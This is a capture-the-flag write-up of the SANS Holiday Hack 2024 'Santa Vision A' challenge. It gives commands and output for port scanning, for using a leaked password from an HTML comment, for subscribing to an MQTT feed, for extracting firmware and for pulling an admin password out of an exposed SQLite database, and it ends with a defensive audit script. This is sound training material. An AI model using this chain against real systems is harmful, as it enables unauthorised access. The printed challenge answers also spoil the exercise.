Santa Vision A
What username logs you into the SantaVision portal?
Difficulty: ❄ ❄ ❄ ❄ ❄
Hints
Misplaced Credentials
From: Ribb Bonbowford Objective: Santa Vision A See if any credentials you find allow you to subscribe to any MQTT feeds.
Filesystem Analysis
From: Ribb Bonbowford Objective: Santa Vision A jefferson is great for analyzing JFFS2 file systems.
Database Pilfering
From: Ribb Bonbowford Objective: Santa Vision A Consider checking any database files for credentials…
Mosquito Mosquitto
From: Ribb Bonbowford Mosquitto is a great client for interacting with MQTT, but their spelling may be suspect. Prefer a GUI? Try MQTTX
Silver
As a first step, I tried to discover the open ports on the server with nmap:
```shell
thedead@maccos act3-SantaVision % nmap 34.44.88.211 -p-
Nmap scan report for 211.88.44.34.bc.googleusercontent.com (34.44.88.211)
Host is up (0.16s latency).
Not shown: 65530 closed tcp ports (conn-refused)
PORT     STATE    SERVICE
22/tcp   open     ssh
1883/tcp open     mqtt
5355/tcp filtered llmnr
8000/tcp open     http-alt
9001/tcp open     tor-orport
Nmap done: 1 IP address (1 host up) scanned in 3165.46 seconds
```
Browsing to http://34.56.1.154:8000, I was presented with a login page:
This was easily bypassed by looking at the HTML source and noticing leftover credentials in a comment:
```html
<div class="footer" id="footer">
<b>©2024 Santavision Elventech Co., Ltd. Snow Rights Reserved.<br>(<i>topic 'sitestatus'</i> available.)</b>
</div> <!-- mqtt: elfanon:elfanon -->
```
Logging in with user elfanon and password elfanon succeeds, and elfanon is the answer for the silver trophy.
Gold
Following the hint in the footer (topic 'sitestatus' available.), I subscribed to the sitestatus topic as elfanon with mosquitto_sub. Among the other messages, one was particularly interesting:
```shell
thedead@maccos act3-SantaVision % mosquitto_sub -v -h 34.44.88.211 -p 1883 -u elfanon -P elfanon -t 'sitestatus'
# ...omissis...
sitestatus File downloaded: /static/sv-application-2024-SuperTopSecret-9265193/applicationDefault.bin
# ...omissis...
```
Once downloaded, the file /static/sv-application-2024-SuperTopSecret-9265193/applicationDefault.bin can be extracted with jefferson and its contents explored:
```shell
thedead@maccos act3-SantaVision % wget http://34.44.88.211:8000/static/sv-application-2024-SuperTopSecret-9265193/applicationDefault.bin
# ... omissis ...
2024-12-23 12:27:10 (687 KB/s) - ‘applicationDefault.bin’ saved [7340032/7340032]
(act3-SantaVision) thedead@maccos act3-SantaVision % jefferson applicationDefault.bin
dumping fs to /Users/thedead/Desktop/repos/SANS_HolidayHack/2024/act3-SantaVision/jffs2-root (endianness: <)
# ... omissis ...
writing S_ISREG app/src/accounts/views.py
# ... omissis ...
writing S_ISREG app/src/core/views.py
# ... omissis ...
```
Looking at the file app/src/accounts/views.py, I found a route that serves a SQLite DB file directly from the static directory:
```python
# ... omissis ...
@accounts_bp.route("/sv2024DB-Santa/SantasTopSecretDB-2024-Z.sqlite", methods=["GET"])
def db():
    return send_from_directory("static", "sv2024DB-Santa/SantasTopSecretDB-2024-Z.sqlite", as_attachment=True)
```
Downloading and opening this file, I found the user santaSiteAdmin, with its password stored in plaintext:
```shell
(act3-SantaVision) thedead@maccos act3-SantaVision % wget http://34.44.88.211:8000/static/sv2024DB-Santa/SantasTopSecretDB-2024-Z.sqlite
# ... omissis ...
2024-12-23 12:35:35 (80.2 KB/s) - ‘SantasTopSecretDB-2024-Z.sqlite’ saved [20480/20480]
(act3-SantaVision) thedead@maccos act3-SantaVision % sqlite3 SantasTopSecretDB-2024-Z.sqlite
# ... omissis ...
sqlite> .tables
alembic_version  users
sqlite> SELECT * FROM users;
1|santaSiteAdmin|S4n+4sr3411yC00Lp455wd|2024-01-23 06:05:29.466071|1
```
Leveraging the santaSiteAdmin credentials, I could log in to the web page again; santaSiteAdmin is the answer to the gold trophy.
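As an added defensive check (my own code, not part of the challenge or of the SantaVision application), the following Python script audits an extracted web root for the two classes of leak that made this objective solvable: credentials left in HTML comments, and Flask routes that hand out database files through send_from_directory. The samples are constructed to mirror the findings above; the /logo route is an assumed benign control.

```python
import re
from typing import List, Tuple

# Constructed samples modelled on the two leaks in this write-up (not the real firmware).
FOOTER_HTML = """<div class="footer" id="footer">
<b>(c)2024 Santavision Elventech Co., Ltd. Snow Rights Reserved.</b>
</div> <!-- mqtt: elfanon:elfanon -->"""

VIEWS_PY = '''@accounts_bp.route("/sv2024DB-Santa/SantasTopSecretDB-2024-Z.sqlite", methods=["GET"])
def db():
    return send_from_directory("static", "sv2024DB-Santa/SantasTopSecretDB-2024-Z.sqlite", as_attachment=True)

@accounts_bp.route("/logo", methods=["GET"])   # assumed benign route, for contrast
def logo():
    return send_from_directory("static", "img/logo.png")
'''

HTML_COMMENT = re.compile(r"<!--(.*?)-->", re.S)
# Crude user:pass token; catches comments like "mqtt: elfanon:elfanon" (the "mqtt:" label is skipped).
USER_PASS = re.compile(r"\b([A-Za-z0-9_.-]+):([^\s:]+)")
ROUTE = re.compile(r'@\w+\.route\(\s*"([^"]+)"')
SEND_DIR = re.compile(r'send_from_directory\(\s*"([^"]+)"\s*,\s*"([^"]+)"')
SENSITIVE_EXT = (".sqlite", ".db", ".sql", ".bak", ".env", ".pem", ".key")


def find_credential_comments(html: str) -> List[Tuple[str, str]]:
    """Return (user, password) pairs found inside HTML comments."""
    hits: List[Tuple[str, str]] = []
    for comment in HTML_COMMENT.findall(html):
        hits.extend(USER_PASS.findall(comment))
    return hits


def find_exposed_files(source: str) -> List[Tuple[str, str]]:
    """Return (route, served_path) for routes that serve files with a sensitive extension."""
    routes = [(m.start(), m.group(1)) for m in ROUTE.finditer(source)]
    exposed: List[Tuple[str, str]] = []
    for m in SEND_DIR.finditer(source):
        served = f"{m.group(1)}/{m.group(2)}"
        # Attribute the call to the nearest preceding @<blueprint>.route decorator.
        route = next((r for pos, r in reversed(routes) if pos < m.start()), None)
        if route and served.lower().endswith(SENSITIVE_EXT):
            exposed.append((route, served))
    return exposed


if __name__ == "__main__":
    print("credentials in HTML comments:", find_credential_comments(FOOTER_HTML))
    print("sensitive files served by routes:", find_exposed_files(VIEWS_PY))
```

In a real audit, run both functions over every .html and .py file under the jffs2-root directory that jefferson produced; any hit is a finding to remove before the image ships.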